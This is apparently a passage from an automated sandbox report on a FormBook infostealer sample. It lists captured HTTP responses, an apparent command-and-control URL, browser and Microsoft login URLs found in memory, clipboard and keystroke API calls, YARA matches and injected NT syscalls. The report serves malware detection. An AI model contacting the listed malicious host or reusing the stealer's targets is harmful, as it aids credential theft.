73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 07:18:15 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 11 Jan 2025 07:18:30 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 11 Jan 2025 07:18:33 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 11 Jan 2025 07:18:35 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 07:18:38 GMTContent-Type: text/htmlContent-Length: 0Connection: close
                Source: tFEgkRNveR.exe, 0000000B.00000002.3136712972.0000000008744000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zriaraem-skiry.sbs
                Source: tFEgkRNveR.exe, 0000000B.00000002.3136712972.0000000008744000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zriaraem-skiry.sbs/f8c6/
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tFEgkRNveR.exe, 0000000B.00000002.3133398918.00000000071A2000.00000004.80000000.00040000.00000000.sdmp, winver.exe, 0000000C.00000002.3128888701.00000000059C2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=10332
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: winver.exe, 0000000C.00000003.1869784041.0000000007604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: tFEgkRNveR.exe, 0000000B.00000002.3133398918.00000000069C8000.00000004.80000000.00040000.00000000.sdmp, winver.exe, 0000000C.00000002.3128888701.00000000051E8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.bt.cn/?from=404
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00584164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00584164
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00584164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00584164
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00583F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00583F66
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0057001C
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0059CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0059CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3136712972.00000000086F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127767556.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3128378843.00000000051C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1635438569.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1635938025.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127852915.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1635105463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3124391485.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: This is a third-party compiled AutoIt script.0_2_00513B3A
                Source: z6tNjJC614.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: z6tNjJC614.exe, 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ec9c5b92-8
                Source: z6tNjJC614.exe, 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_bc716f9e-9
                Source: z6tNjJC614.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e2f9f6aa-c
                Source: z6tNjJC614.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_402d90a3-a
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0042C9F3 NtClose,8_2_0042C9F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040AA5D NtResumeThread,8_2_0040AA5D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972B60 NtClose,LdrInitializeThunk,8_2_03972B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03972DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039735C0 NtCreateMutant,LdrInitializeThunk,8_2_039735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03974340 NtSetContextThread,8_2_03974340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03974650 NtSuspendThread,8_2_03974650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972B80 NtQueryInformationFile,8_2_03972B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972BA0 NtEnumerateValueKey,8_2_03972BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972BF0 NtAllocateVirtualMemory,8_2_03972BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972BE0 NtQueryValueKey,8_2_03972BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972AB0 NtWaitForSingleObject,8_2_03972AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972AD0 NtReadFile,8_2_03972AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972AF0 NtWriteFile,8_2_03972AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972F90 NtProtectVirtualMemory,8_2_03972F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972FB0 NtResumeThread,8_2_03972FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972FA0 NtQuerySection,8_2_03972FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972FE0 NtCreateFile,8_2_03972FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972F30 NtCreateSection,8_2_03972F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972F60 NtCreateProcessEx,8_2_03972F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972E80 NtReadVirtualMemory,8_2_03972E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972EA0 NtAdjustPrivilegesToken,8_2_03972EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972EE0 NtQueueApcThread,8_2_03972EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972E30 NtWriteVirtualMemory,8_2_03972E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972DB0 NtEnumerateKey,8_2_03972DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972DD0 NtDelayExecution,8_2_03972DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972D10 NtMapViewOfSection,8_2_03972D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972D00 NtSetInformationFile,8_2_03972D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972D30 NtUnmapViewOfSection,8_2_03972D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972CA0 NtQueryInformationToken,8_2_03972CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972CC0 NtQueryVirtualMemory,8_2_03972CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972CF0 NtOpenProcess,8_2_03972CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972C00 NtQueryInformationProcess,8_2_03972C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972C70 NtFreeVirtualMemory,8_2_03972C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03972C60 NtCreateKey,8_2_03972C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03973090 NtSetValueKey,8_2_03973090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03973010 NtOpenDirectoryObject,8_2_03973010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039739B0 NtGetContextThread,8_2_039739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03973D10 NtOpenProcessToken,8_2_03973D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03973D70 NtOpenThread,8_2_03973D70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04524650 NtSuspendThread,LdrInitializeThunk,12_2_04524650
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04524340 NtSetContextThread,LdrInitializeThunk,12_2_04524340
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04522C70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522C60 NtCreateKey,LdrInitializeThunk,12_2_04522C60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_04522CA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522D10 NtMapViewOfSection,LdrInitializeThunk,12_2_04522D10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_04522D30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522DD0 NtDelayExecution,LdrInitializeThunk,12_2_04522DD0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_04522DF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522EE0 NtQueueApcThread,LdrInitializeThunk,12_2_04522EE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_04522E80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522F30 NtCreateSection,LdrInitializeThunk,12_2_04522F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522FE0 NtCreateFile,LdrInitializeThunk,12_2_04522FE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522FB0 NtResumeThread,LdrInitializeThunk,12_2_04522FB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522AD0 NtReadFile,LdrInitializeThunk,12_2_04522AD0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522AF0 NtWriteFile,LdrInitializeThunk,12_2_04522AF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522B60 NtClose,LdrInitializeThunk,12_2_04522B60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04522BF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522BE0 NtQueryValueKey,LdrInitializeThunk,12_2_04522BE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_04522BA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045235C0 NtCreateMutant,LdrInitializeThunk,12_2_045235C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_045239B0 NtGetContextThread,LdrInitializeThunk,12_2_045239B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522C00 NtQueryInformationProcess,12_2_04522C00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522CC0 NtQueryVirtualMemory,12_2_04522CC0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522CF0 NtOpenProcess,12_2_04522CF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522D00 NtSetInformationFile,12_2_04522D00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522DB0 NtEnumerateKey,12_2_04522DB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522E30 NtWriteVirtualMemory,12_2_04522E30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522EA0 NtAdjustPrivilegesToken,12_2_04522EA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522F60 NtCreateProcessEx,12_2_04522F60
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522F90 NtProtectVirtualMemory,12_2_04522F90
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522FA0 NtQuerySection,12_2_04522FA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522AB0 NtWaitForSingleObject,12_2_04522AB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04522B80 NtQueryInformationFile,12_2_04522B80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04523010 NtOpenDirectoryObject,12_2_04523010
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04523090 NtSetValueKey,12_2_04523090
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04523D70 NtOpenThread,12_2_04523D70
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_04523D10 NtOpenProcessToken,12_2_04523D10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_004B9310 NtCreateFile,12_2_004B9310
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_004B9480 NtReadFile,12_2_004B9480
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_004B9570 NtDeleteFile,12_2_004B9570
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_004B9610 NtClose,12_2_004B9610
                Source: C:\Windows\SysWOW64\winver.exeCode function: 12_2_004B9780 NtAllocateVirtualMemory,12_2_004B9780
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0057A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0057A1EF
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00568310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00568310
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_005751BD
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0051E6A00_2_0051E6A0
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0053D9750_2_0053D975
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0051FCE00_2_0051FCE0
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005321C50_2_005321C5
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005462D20_2_005462D2
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005903DA0_2_005903DA
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0054242E0_2_0054242E
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005325FA0_2_005325FA
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0056E6160_2_0056E616
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005266E10_2_005266E1
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0054878F0_2_0054878F
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005908570_2_00590857
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005468440_2_00546844
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005288080_2_00528808
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_005788890_2_00578889
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_0053CB210_2_0053CB21
